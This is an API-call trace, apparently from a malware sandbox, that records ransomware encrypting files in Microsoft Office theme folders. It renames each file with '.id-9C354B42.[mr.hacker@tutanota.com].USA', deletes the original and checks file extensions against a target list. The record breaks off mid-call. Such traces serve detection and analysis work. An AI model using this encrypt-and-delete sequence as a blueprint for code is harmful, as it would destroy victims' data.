WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.177] SetEndOfFile (hFile=0x1fc) returned 1 [0046.177] CloseHandle (hObject=0x1fc) returned 1 [0046.177] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.177] SetEndOfFile (hFile=0x174) returned 1 [0046.178] CloseHandle (hObject=0x174) returned 1 [0046.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.178] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\preview.gif")) returned 1 [0046.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.178] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.178] lstrlenW (lpString=".doc") returned 4 [0046.178] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.178] lstrlenW (lpString=".docx") returned 5 [0046.178] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.178] lstrlenW (lpString=".pdf") returned 4 [0046.178] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.178] lstrlenW (lpString=".xls") returned 4 [0046.179] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.179] lstrlenW (lpString=".xlsx") returned 5 [0046.179] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.179] lstrlenW (lpString=".ppt") returned 4 [0046.179] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.179] lstrlenW (lpString=".zip") returned 4 [0046.179] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.179] lstrlenW (lpString=".rar") returned 4 [0046.179] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.179] lstrlenW (lpString=".bz2") returned 4 [0046.179] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.179] lstrlenW (lpString=".7z") returned 3 [0046.179] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.179] lstrlenW (lpString=".dbf") returned 4 [0046.179] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.179] lstrlenW (lpString=".1cd") returned 4 [0046.179] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.179] lstrlenW (lpString=".jpg") returned 4 [0046.179] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.179] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.179] lstrlenW (lpString=".doc") returned 4 [0046.179] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.179] lstrlenW (lpString=".docx") returned 5 [0046.179] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.179] lstrlenW (lpString=".pdf") returned 4 [0046.179] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.179] lstrlenW (lpString=".xls") returned 4 [0046.179] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.179] lstrlenW (lpString=".xlsx") returned 5 [0046.179] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.179] lstrlenW (lpString=".ppt") returned 4 [0046.180] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.180] lstrlenW (lpString=".zip") returned 4 [0046.180] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.180] lstrlenW (lpString=".rar") returned 4 [0046.180] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.180] lstrlenW (lpString=".bz2") returned 4 [0046.180] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.180] lstrlenW (lpString=".7z") returned 3 [0046.180] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.180] lstrlenW (lpString=".dbf") returned 4 [0046.180] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.180] lstrlenW (lpString=".1cd") returned 4 [0046.180] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.180] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\PREVIEW.GIF") returned 76 [0046.180] lstrlenW (lpString=".jpg") returned 4 [0046.180] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.180] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0046.180] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.180] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.181] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=60724) returned 1 [0046.181] CloseHandle (hObject=0x174) returned 1 [0046.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 0x20 [0046.181] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.181] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.181] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.181] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.182] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.182] GetLastError () returned 0x0 [0046.182] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0xed34, lpOverlapped=0x0) returned 1 [0046.184] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xed40, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xed40, lpOverlapped=0x0) returned 1 [0046.186] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0046.186] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.186] SetEndOfFile (hFile=0x1fc) returned 1 [0046.186] CloseHandle (hObject=0x1fc) returned 1 [0046.187] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.187] SetEndOfFile (hFile=0x174) returned 1 [0046.188] CloseHandle (hObject=0x174) returned 1 [0046.188] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.188] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\expeditn\\thmbnail.png")) returned 1 [0046.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.188] lstrlenW (lpString=".doc") returned 4 [0046.188] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.188] lstrlenW (lpString=".docx") returned 5 [0046.188] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.188] lstrlenW (lpString=".pdf") returned 4 [0046.188] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.188] lstrlenW (lpString=".xls") returned 4 [0046.188] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.188] lstrlenW (lpString=".xlsx") returned 5 [0046.188] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.188] lstrlenW (lpString=".ppt") returned 4 [0046.188] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.188] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.188] lstrlenW (lpString=".zip") returned 4 [0046.188] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.188] lstrlenW (lpString=".rar") returned 4 [0046.189] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.189] lstrlenW (lpString=".bz2") returned 4 [0046.189] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.189] lstrlenW (lpString=".7z") returned 3 [0046.189] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.189] lstrlenW (lpString=".dbf") returned 4 [0046.189] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.189] lstrlenW (lpString=".1cd") returned 4 [0046.189] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.189] lstrlenW (lpString=".jpg") returned 4 [0046.189] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.189] lstrlenW (lpString=".doc") returned 4 [0046.189] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.189] lstrlenW (lpString=".docx") returned 5 [0046.189] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.189] lstrlenW (lpString=".pdf") returned 4 [0046.189] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.189] lstrlenW (lpString=".xls") returned 4 [0046.189] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.189] lstrlenW (lpString=".xlsx") returned 5 [0046.189] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.189] lstrlenW (lpString=".ppt") returned 4 [0046.189] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.189] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.189] lstrlenW (lpString=".zip") returned 4 [0046.189] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.189] lstrlenW (lpString=".rar") returned 4 [0046.189] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.189] lstrlenW (lpString=".bz2") returned 4 [0046.189] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.190] lstrlenW (lpString=".7z") returned 3 [0046.190] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.190] lstrlenW (lpString=".dbf") returned 4 [0046.190] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.190] lstrlenW (lpString=".1cd") returned 4 [0046.190] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.190] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\EXPEDITN\\THMBNAIL.PNG") returned 77 [0046.190] lstrlenW (lpString=".jpg") returned 4 [0046.190] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.190] lstrcmpiW (lpString1=".GIF", lpString2=".USA") returned -1 [0046.190] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.190] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.190] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=2552) returned 1 [0046.190] CloseHandle (hObject=0x174) returned 1 [0046.190] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif")) returned 0x20 [0046.191] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.191] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.191] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.192] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.192] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.193] GetLastError () returned 0x0 [0046.193] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x9f8, lpOverlapped=0x0) returned 1 [0046.195] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xa00, lpOverlapped=0x0) returned 1 [0046.196] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0046.196] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.196] SetEndOfFile (hFile=0x1fc) returned 1 [0046.196] CloseHandle (hObject=0x1fc) returned 1 [0046.196] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.196] SetEndOfFile (hFile=0x174) returned 1 [0046.197] CloseHandle (hObject=0x174) returned 1 [0046.197] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0046.197] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\preview.gif")) returned 1 [0046.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.197] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.197] lstrlenW (lpString=".doc") returned 4 [0046.197] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.197] lstrlenW (lpString=".docx") returned 5 [0046.197] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.197] lstrlenW (lpString=".pdf") returned 4 [0046.197] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.197] lstrlenW (lpString=".xls") returned 4 [0046.197] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.197] lstrlenW (lpString=".xlsx") returned 5 [0046.197] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.198] lstrlenW (lpString=".ppt") returned 4 [0046.198] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.198] lstrlenW (lpString=".zip") returned 4 [0046.198] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.198] lstrlenW (lpString=".rar") returned 4 [0046.198] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.198] lstrlenW (lpString=".bz2") returned 4 [0046.198] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.198] lstrlenW (lpString=".7z") returned 3 [0046.198] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.198] lstrlenW (lpString=".dbf") returned 4 [0046.198] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.198] lstrlenW (lpString=".1cd") returned 4 [0046.198] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.198] lstrlenW (lpString=".jpg") returned 4 [0046.198] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.198] lstrlenW (lpString=".doc") returned 4 [0046.198] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.198] lstrlenW (lpString=".docx") returned 5 [0046.198] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.198] lstrlenW (lpString=".pdf") returned 4 [0046.198] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.198] lstrlenW (lpString=".xls") returned 4 [0046.198] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.198] lstrlenW (lpString=".xlsx") returned 5 [0046.198] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.198] lstrlenW (lpString=".ppt") returned 4 [0046.198] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.198] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.199] lstrlenW (lpString=".zip") returned 4 [0046.199] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.199] lstrlenW (lpString=".rar") returned 4 [0046.199] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.199] lstrlenW (lpString=".bz2") returned 4 [0046.199] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.199] lstrlenW (lpString=".7z") returned 3 [0046.199] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.199] lstrlenW (lpString=".dbf") returned 4 [0046.199] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.199] lstrlenW (lpString=".1cd") returned 4 [0046.199] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.199] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\PREVIEW.GIF") returned 71 [0046.199] lstrlenW (lpString=".jpg") returned 4 [0046.199] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.199] lstrcmpiW (lpString1=".PNG", lpString2=".USA") returned -1 [0046.199] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.199] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.199] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2deff1c | out: lpFileSize=0x2deff1c*=18817) returned 1 [0046.199] CloseHandle (hObject=0x174) returned 1 [0046.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png")) returned 0x20 [0046.200] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0046.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0046.200] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.200] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2defec8 | out: lpNewFilePointer=0x0) returned 1 [0046.200] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ICE\\THMBNAIL.PNG.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ice\\thmbnail.png.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1fc [0046.200] GetLastError () returned 0x0 [0046.200] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x4981, lpOverlapped=0x0) returned 1 [0046.419] WriteFile (in: hFile=0x1fc, lpBuffer=0x3860020*, nNumberOfBytesToWrite=0x4990, lpNumberOfBytesWritten=0x2defc9c, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesWritten=0x2defc9c*=0x4990, lpOverlapped=0x0) returned 1 [0046.420] ReadFile (in: hFile=0x174, lpBuffer=0x3860020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2defed4, lpOverlapped=0x0 | out: lpBuffer=0x3860020*, lpNumberOfBytesRead=0x2defed4*=0x0, lpOverlapped=0x0) returned 1 [0046.420] WriteFile (in: hFile=0x1fc, 